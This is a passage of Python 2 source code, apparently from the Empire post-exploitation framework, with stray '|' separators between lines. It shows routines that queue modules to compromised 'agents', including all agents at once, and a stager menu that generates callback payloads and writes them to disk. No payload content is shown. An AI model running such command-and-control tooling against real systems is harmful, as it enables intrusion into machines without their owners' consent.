agentName = self.module.options['Agent']['Value']
|
|
|
|
moduleData = self.module.generate()
|
|
|
|
|
|
|
|
# strip all comments from the module
|
|
|
|
moduleData = helpers.strip_powershell_comments(moduleData)
|
|
|
|
|
|
|
|
if not moduleData or moduleData == "":
|
|
|
|
print helpers.color("[!] Error: module produced an empty script")
|
|
|
|
dispatcher.send("[!] Error: module produced an empty script", sender="Empire")
|
|
|
|
return
|
|
|
|
|
|
|
|
taskCommand = ""
|
|
|
|
|
|
|
|
# build the appropriate task command and module data blob
|
|
|
|
if str(self.module.info['Background']).lower() == "true":
|
|
|
|
# if this module should be run in the background
|
|
|
|
extention = self.module.info['OutputExtension']
|
|
|
|
if extention and extention != "":
|
|
|
|
# if this module needs to save its file output to the server
|
|
|
|
# format- [15 chars of prefix][5 chars extension][data]
|
|
|
|
saveFilePrefix = self.moduleName.split("/")[-1]
|
|
|
|
moduleData = saveFilePrefix.rjust(15) + extention.rjust(5) + moduleData
|
|
|
|
taskCommand = "TASK_CMD_JOB_SAVE"
|
|
|
|
else:
|
|
|
|
taskCommand = "TASK_CMD_JOB"
|
|
|
|
else:
|
|
|
|
# if this module is run in the foreground
|
|
|
|
extention = self.module.info['OutputExtension']
|
|
|
|
if self.module.info['OutputExtension'] and self.module.info['OutputExtension'] != "":
|
|
|
|
# if this module needs to save its file output to the server
|
|
|
|
# format- [15 chars of prefix][5 chars extension][data]
|
|
|
|
saveFilePrefix = self.moduleName.split("/")[-1][:15]
|
|
|
|
moduleData = saveFilePrefix.rjust(15) + extention.rjust(5) + moduleData
|
|
|
|
taskCommand = "TASK_CMD_WAIT_SAVE"
|
|
|
|
else:
|
|
|
|
taskCommand = "TASK_CMD_WAIT"
|
|
|
|
|
|
|
|
# if we're running the module on all modules
|
|
|
|
if agentName.lower() == "all":
|
|
|
|
try:
|
|
|
|
choice = raw_input(helpers.color("[>] Run module on all agents? [y/N] ", "red"))
|
|
|
|
if choice.lower() != "" and choice.lower()[0] == "y":
|
|
|
|
|
|
|
|
# signal everyone with what we're doing
|
|
|
|
print helpers.color("[*] Tasking all agents to run " + self.moduleName)
|
|
|
|
dispatcher.send("[*] Tasking all agents to run " + self.moduleName, sender="Empire")
|
|
|
|
|
|
|
|
# actually task the agents
|
|
|
|
for agent in self.mainMenu.agents.get_agents():
|
|
|
|
|
|
|
|
sessionID = agent[1]
|
|
|
|
|
|
|
|
# set the agent's tasking in the cache
|
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, taskCommand, moduleData)
|
|
|
|
|
|
|
|
# update the agent log
|
|
|
|
dispatcher.send("[*] Tasked agent "+sessionID+" to run module " + self.moduleName, sender="Empire")
|
|
|
|
msg = "Tasked agent to run module " + self.moduleName
|
|
|
|
self.mainMenu.agents.save_agent_log(sessionID, msg)
|
|
|
|
|
|
|
|
except KeyboardInterrupt as e: print ""
|
|
|
|
|
|
|
|
else:
|
|
|
|
if not self.mainMenu.agents.is_agent_present(agentName):
|
|
|
|
print helpers.color("[!] Invalid agent name.")
|
|
|
|
else:
|
|
|
|
# set the agent's tasking in the cache
|
|
|
|
self.mainMenu.agents.add_agent_task(agentName, taskCommand, moduleData)
|
|
|
|
|
|
|
|
# update the agent log
|
|
|
|
dispatcher.send("[*] Tasked agent "+agentName+" to run module " + self.moduleName, sender="Empire")
|
|
|
|
msg = "Tasked agent to run module " + self.moduleName
|
|
|
|
self.mainMenu.agents.save_agent_log(agentName, msg)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_set(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a module option to set."
|
|
|
|
|
|
|
|
options = self.module.options.keys()
|
|
|
|
|
|
|
|
if line.split(" ")[1].lower() == "agent":
|
|
|
|
# if we're tab-completing "agent", return the agent names
|
|
|
|
agentNames = self.mainMenu.agents.get_agent_names()
|
|
|
|
endLine = " ".join(line.split(" ")[1:])
|
|
|
|
|
|
|
|
mline = endLine.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in agentNames if s.startswith(mline)]
|
|
|
|
|
|
|
|
elif line.split(" ")[1].lower() == "listener":
|
|
|
|
# if we're tab-completing a listener name, return all the names
|
|
|
|
listenerNames = self.mainMenu.listeners.get_listener_names()
|
|
|
|
endLine = " ".join(line.split(" ")[1:])
|
|
|
|
|
|
|
|
mline = endLine.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in listenerNames if s.startswith(mline)]
|
|
|
|
|
|
|
|
elif line.split(" ")[1].lower().endswith("path"):
|
|
|
|
return helpers.complete_path(text,line,arg=True)
|
|
|
|
|
|
|
|
elif line.split(" ")[1].lower().endswith("file"):
|
|
|
|
return helpers.complete_path(text,line,arg=True)
|
|
|
|
|
|
|
|
elif line.split(" ")[1].lower().endswith("host"):
|
|
|
|
return [helpers.lhost()]
|
|
|
|
|
|
|
|
# otherwise we're tab-completing an option name
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in options if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_unset(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a module option to unset."
|
|
|
|
|
|
|
|
options = self.module.options.keys() + ["all"]
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in options if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_usemodule(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an Empire PowerShell module path."
|
|
|
|
return self.mainMenu.complete_usemodule(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_creds(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete 'creds' commands."
|
|
|
|
return self.mainMenu.complete_creds(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class StagerMenu(cmd.Cmd):
|
|
|
|
|
|
|
|
def __init__(self, mainMenu, stagerName, listener=None):
|
|
|
|
cmd.Cmd.__init__(self)
|
|
|
|
self.doc_header = 'Stager Menu'
|
|
|
|
|
|
|
|
self.mainMenu = mainMenu
|
|
|
|
|
|
|
|
# get the current stager name
|
|
|
|
self.stagerName = stagerName
|
|
|
|
self.stager = self.mainMenu.stagers.stagers[stagerName]
|
|
|
|
|
|
|
|
# set the prompt text
|
|
|
|
self.prompt = '(Empire: '+helpers.color("stager/"+self.stagerName, color="blue")+') > '
|
|
|
|
|
|
|
|
# if this menu is being called from an listener menu
|
|
|
|
if listener:
|
|
|
|
# resolve the listener ID to a name, if applicable
|
|
|
|
listener = self.mainMenu.listeners.get_listener(listener)
|
|
|
|
self.stager.options['Listener']['Value'] = listener
|
|
|
|
|
|
|
|
|
|
|
|
def validate_options(self):
|
|
|
|
"Make sure all required stager options are completed."
|
|
|
|
|
|
|
|
for option,values in self.stager.options.iteritems():
|
|
|
|
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
|
|
|
|
print helpers.color("[!] Error: Required stager option missing.")
|
|
|
|
return False
|
|
|
|
|
|
|
|
listenerName = self.stager.options['Listener']['Value']
|
|
|
|
|
|
|
|
if not self.mainMenu.listeners.is_listener_valid(listenerName):
|
|
|
|
print helpers.color("[!] Invalid listener ID or name.")
|
|
|
|
return False
|
|
|
|
|
|
|
|
return True
|
|
|
|
|
|
|
|
|
|
|
|
def emptyline(self): pass
|
|
|
|
|
|
|
|
|
|
|
|
# print a nicely formatted help menu
|
|
|
|
# stolen/adapted from recon-ng
|
|
|
|
def print_topics(self, header, cmds, cmdlen, maxcol):
|
|
|
|
if cmds:
|
|
|
|
self.stdout.write("%s\n"%str(header))
|
|
|
|
if self.ruler:
|
|
|
|
self.stdout.write("%s\n"%str(self.ruler * len(header)))
|
|
|
|
for cmd in cmds:
|
|
|
|
self.stdout.write("%s %s\n" % (cmd.ljust(17), getattr(self, 'do_' + cmd).__doc__))
|
|
|
|
self.stdout.write("\n")
|
|
|
|
|
|
|
|
|
|
|
|
def do_exit(self, line):
|
|
|
|
"Exit Empire."
|
|
|
|
raise SystemExit
|
|
|
|
|
|
|
|
|
|
|
|
def do_main(self, line):
|
|
|
|
"Return to the main menu."
|
|
|
|
return True
|
|
|
|
|
|
|
|
|
|
|
|
def do_info(self, line):
|
|
|
|
"Display stager options."
|
|
|
|
messages.display_stager(self.stagerName, self.stager)
|
|
|
|
|
|
|
|
|
|
|
|
def do_options(self, line):
|
|
|
|
"Display stager options."
|
|
|
|
messages.display_stager(self.stagerName, self.stager)
|
|
|
|
|
|
|
|
|
|
|
|
def do_back(self, line):
|
|
|
|
"Return to the main menu."
|
|
|
|
return True
|
|
|
|
|
|
|
|
|
|
|
|
def do_main(self, line):
|
|
|
|
"Go back to the main menu."
|
|
|
|
raise StopIteration
|
|
|
|
|
|
|
|
|
|
|
|
def do_set(self, line):
|
|
|
|
"Set a stager option."
|
|
|
|
|
|
|
|
parts = line.split()
|
|
|
|
|
|
|
|
try:
|
|
|
|
option = parts[0]
|
|
|
|
if option not in self.stager.options:
|
|
|
|
print helpers.color("[!] Invalid option specified.")
|
|
|
|
|
|
|
|
elif len(parts) == 1 :
|
|
|
|
# "set OPTION"
|
|
|
|
# check if we're setting a switch
|
|
|
|
if self.stager.options[option]['Description'].startswith("Switch."):
|
|
|
|
self.stager.options[option]['Value'] = "True"
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please specify an option value.")
|
|
|
|
else:
|
|
|
|
# otherwise "set OPTION VALUE"
|
|
|
|
option = parts[0]
|
|
|
|
value = " ".join(parts[1:])
|
|
|
|
|
|
|
|
if value == '""' or value == "''": value = ""
|
|
|
|
|
|
|
|
self.stager.options[option]['Value'] = value
|
|
|
|
except:
|
|
|
|
print helpers.color("[!] Error in setting option, likely invalid option name.")
|
|
|
|
|
|
|
|
|
|
|
|
def do_unset(self, line):
|
|
|
|
"Unset a stager option."
|
|
|
|
|
|
|
|
option = line.split()[0]
|
|
|
|
|
|
|
|
if line.lower() == "all":
|
|
|
|
for option in self.stager.options:
|
|
|
|
self.stager.options[option]['Value'] = ''
|
|
|
|
if option not in self.stager.options:
|
|
|
|
print helpers.color("[!] Invalid option specified.")
|
|
|
|
else:
|
|
|
|
self.stager.options[option]['Value'] = ''
|
|
|
|
|
|
|
|
|
|
|
|
def do_generate(self, line):
|
|
|
|
"Generate/execute the given Empire stager."
|
|
|
|
|
|
|
|
if not self.validate_options():
|
|
|
|
return
|
|
|
|
|
|
|
|
stagerOutput = self.stager.generate()
|
|
|
|
|
|
|
|
savePath = ''
|
|
|
|
if 'OutFile' in self.stager.options:
|
|
|
|
savePath = self.stager.options['OutFile']['Value']
|
|
|
|
|
|
|
|
if savePath != '':
|
|
|
|
# make the base directory if it doesn't exist
|
|
|
|
if not os.path.exists(os.path.dirname(savePath)) and os.path.dirname(savePath) != '':
|
|
|
|
os.makedirs(os.path.dirname(savePath))
|
|
|
|
|
|
|
|
# if we need to write binary output for a .dll
|
|
|
|
if ".dll" in savePath:
|
|
|
|
f = open(savePath, 'wb')
|
|
|
|
f.write(bytearray(stagerOutput))
|
|
|
|
f.close()
|
|
|
|
else:
|
|
|
|
# otherwise normal output
|
|
|
|
f = open(savePath, 'w')
|
|
|
|
f.write(stagerOutput)
|
|
|
|
f.close()
|
|
|
|
|
|
|
|
# if this is a bash script, make it executable
|
|
|
|
if ".sh" in savePath:
|
|
|
|
os.chmod(savePath, 777)
|
|
|
|
|
|
|
|
print "\n" + helpers.color("[*] Stager output written out to: "+savePath+"\n")
|
|
|
|
else:
|
|
|
|
print stagerOutput
|
|
|
|
|
|
|
|
|
|
|
|
def do_execute(self, line):
|
|
|
|
"Generate/execute the given Empire stager."
|
|
|
|
|
|
|
|
self.do_generate(line)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_set(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a stager option to set."
|
|
|
|
|
|
|
|
options = self.stager.options.keys()
|
|
|
|
|
|
|
|
if line.split(" ")[1].lower() == "listener":
|
|
|
|
# if we're tab-completing a listener name, return all the names
|
|
|
|
listenerNames = self.mainMenu.listeners.get_listener_names()
|
|
|
|
endLine = " ".join(line.split(" ")[1:])
|
|
|
|
|
|
|
|
mline = endLine.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in listenerNames if s.startswith(mline)]
|
|
|
|
|
|
|
|
elif line.split(" ")[1].lower().endswith("path"):
|
|
|
|
# tab-complete any stager option that ends with 'path'
|
|
|
|
return helpers.complete_path(text,line,arg=True)
|
|
|
|
|
|
|
|
# otherwise we're tab-completing an option name
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in options if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_unset(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a stager option to unset."
|
|
|
|
|
|
|
|
options = self.stager.options.keys() + ["all"]
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in options if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def do_agents(self, line):
|
|
|
|
"Jump to the Agents menu."
|
|
|
|
a = AgentsMenu(self.mainMenu)
|
|
|
|
a.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_listeners(self, line):
|
|
|
|
"Jump to the listeners menu."
|
|
|
|
l = ListenerMenu(self.mainMenu)
|
|
|
|
l.cmdloop()
|